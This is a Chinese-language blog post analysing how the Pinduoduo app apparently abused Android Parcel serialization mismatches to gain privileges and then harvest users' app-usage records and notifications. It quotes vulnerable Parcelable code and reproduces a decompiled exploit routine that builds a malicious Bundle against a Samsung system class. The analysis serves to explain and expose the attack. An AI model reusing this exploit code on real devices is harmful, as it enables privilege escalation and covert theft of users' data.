一般的应用,都是避免自身被攻击,而拼多多却是让其自身成为一个木马程序,去攻击获取用户信息,确实是没有底线,还有王法么??
这里我们参考各位热心大佬的分析,看看拼多多是Parcel漏洞利用的方式,
在https://xz.aliyun.com/t/2364 里,通过一个读写int不匹配的例子,来说明了Parcel漏洞的4个字节的错位,会导致注入攻击。
@Override
public void writeToParcel(Parcel dest, int flags) {
dest.writeInt(syncHandle);
dest.writeLong(txPower);
dest.writeInt(rssi);
dest.writeInt(dataStatus);
if (data != null) {
dest.writeInt(1);
dest.writeByteArray(data.getBytes());
} else {
dest.writeInt(0);
}
}
private void readFromParcel(Parcel in) {
syncHandle = in.readInt();
txPower = in.readInt();
rssi = in.readInt();
dataStatus = in.readInt();
if (in.readInt() == 1) {
data = ScanRecord.parseFromBytes(in.createByteArray());
}
}
这是个比较明显的读写不匹配漏洞,还有byte数组的处理漏洞,通过写入大小为0的byte数组来制造错位。
https://anquan.baidu.com/article/902
class Demo implements Parcelable { byte[] data; public Demo() { this.data = new byte[0]; } protected Demo(Parcel in) { int length = in.readInt(); data = new byte[length]; if (length > 0) { in.readByteArray(data); } } public static final Creator<Demo> CREATOR = new Creator<Demo>() { @Override public Demo createFromParcel(Parcel in) { return new Demo(in); } }; @Override public void writeToParcel(Parcel parcel, int i) { parcel.writeInt(data.length); parcel.writeByteArray(data); } }
如果数据数组大小为0,那么在创建对象时,createFromParcel()中将读取一个int(4字节),writeToParcel()将写入两个int(8字节)。第一个int将通过显式调用writeInt来编写,调用writeByteArray()时将写入第二个int,因为数组长度总是在Parcel中的数组之前写入(参见图1)。
数据数组大小等于0的情况非常少见,但即使发生这种情况,如果每次只传输一个序列化对象(在我们的例子中是Demo对象),程序也会继续运行。因此,这些漏洞往往不会引起注意。
拼多多是怎么搞的呢,参考
https://www.iculture.cc/forum-post/33645.html
https://github.com/davinci1010/pinduoduo_backdoor
// assets/component/com.xunmeng.pinduoduo.AliveBaseAbilitiy
// [Manwei]
// com/xunmeng/pinduoduo/android_pull_ablity_comp/pullstartup/SamsungAlivePullStartup
Public static Bundle makeBundleForSamsungSinceP(Intent intent){
Bundle bundle = new Bundle();
Parcel obtain = Parcel.obtain();
Parcel obtain2 = Parcel.obtain();
Parcel obtain3 = Parcel.obtain();
obtain2.writeInt(3);
obtain2.writeInt(13);
obtain2.writeInt(72);
obtain2.writeInt(3);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(4);
obtain2.writeString("com.samsung.android.cepproxyks.CertByte");
obtain2.writeInt(0);
byte b[] = new byte[0];
obtain2.writeByteArray(b);
obtain2.writeInt(0);
obtain2.writeInt(13);
obtain2.writeInt(72);
obtain2.writeInt(53);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(1);
obtain2.writeInt(1);
obtain2.writeInt(13);
obtain2.writeInt(72);
obtain2.writeInt(48);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(0);
obtain2.writeInt(13);
obtain2.writeInt(-1);
int dataPosition = obtain2.dataPosition();
obtain2.writeString("intent");
obtain2.writeInt(4);
obtain2.writeString("android.content.Intent");
obtain2.writeToParcel(obtain3, 0);
obtain2.appendFrom(obtain3, 0, obtain3.dataSize());
int dataPosition2 = obtain2.dataPosition();
obtain2.setDataPosition(dataPosition2 - 4);
obtain2.writeInit(dataPosition2 -dataPosition);
obtain2.setdataPosition(dataPosition2);
int dataSize = obtain2.dataSize();
obtain.writeInt(dataSize);
obtain.writeInt(1279544898);
obtain.appendFrom(obtain2, 0, dataSize);
obtain.setDataPosition(0);
bundle.readFromParcel(obtain);
return bundle;
}
提权后,就开始瞎搞了,动态下发dex,开始给自己保活,防卸载,然后搞数据,这部分代码比较通俗易懂, 比如:
1a68d982e02fc22b464693a06f528fac.dex 读取用户手机上的app使用记录
95cd95ab4d694ad8bdf49f07e3599fb3.dex 读取用户手机的应用通知,这一波各大公司app全灭了吧?
可以看到,拼多多使用了长度为0的byte数组漏洞攻击
byte b[] = new byte[0];
发现系统中存在漏洞的类,(系统中的类在系统代码里可以直接使用,如果是在应用空间里自定义一个读写不匹配的Parcelable类,系统代码在处理时会识别不了),并且使用bundle系列化的方式利用起来构成读写错位,进而注入恶意功能,就是其攻击方式。
这里主要是讨论了其parcel漏洞的利用方式。